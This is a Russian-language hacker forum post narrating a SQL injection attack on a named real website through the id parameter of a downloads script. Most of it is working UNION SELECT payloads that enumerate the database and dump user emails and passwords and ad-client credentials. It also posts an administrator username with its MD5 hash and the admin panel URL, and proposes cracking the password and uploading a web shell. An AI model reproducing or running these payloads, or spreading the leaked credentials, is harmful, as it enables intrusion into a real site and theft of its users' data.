Набрел сегодня на ресурс http://techpowerup.com Решил посмотреть google p-r 4 индекс цитирования 275, вообщем то достаточно посещаемы... принялся за исследование. обнаружил что присутствует недостаточная фильтрация параметра id у скриптига get.php Code: http://www.techpowerup.com/downloads/get.php?id=187 Немного повозился и понял что это ненаглядная 5 ветка Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* Начал исследование Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,count(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables/* Первой особо интересной таблой оказалась list_user_user. И тут оказалсь что мажик квотс нету))) Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='list_user_user'/* Тут же появился запрос Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),confirmed,entered,char(58,58,58),email,uniqid,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+list_user_user/* 9600 с чем то пользователей =) Поехал дальше наткнулся на phpads_clients Здесь уже все оказалось не так просто Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='phpads_clients'/* Запрос получился такой: Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+phpads_clients/* Но в ответ меня послали, табла не в той базе, пришлось поковыряться с table_schema: Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,Table_schema,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_name='phpads_clients'/* и далее пошел уже правельный запрос: Code: http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+techpowerup_ads.phpads_clients/* Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом.. Прям так все карты я раскрывать не буду, так или иначе методы действия и подходы к выводу инфы я показал, приложив немного усилий вы получите любую информацию из базы =) Вот такие дела нынче Code: [B]з.Ы таблы forum moderation moderator administrator можно не смотеть[/B]
Дело в том что pr и индекс цетирования высок, да и вообще просто есть пространство для развития мылси =) Обидно кидать скуль вместе с тренировочными инжектами на безизветсных сайтах
http://www.techpowerup.com/ads/admin/index.php Code: w1zzard:639e4f0709b66134e304e35073ec9a2d Расшифровываем пасс и заливаем шелл благо способов несколько=\ эта особенность PhpAdsNew и OpenAds (что по сути одно и то же). По дефолту админ хранится в таблице phpads_config. Поля admin и admin_pw для логина и пасса соответственно. Пасс в чистом мд5.
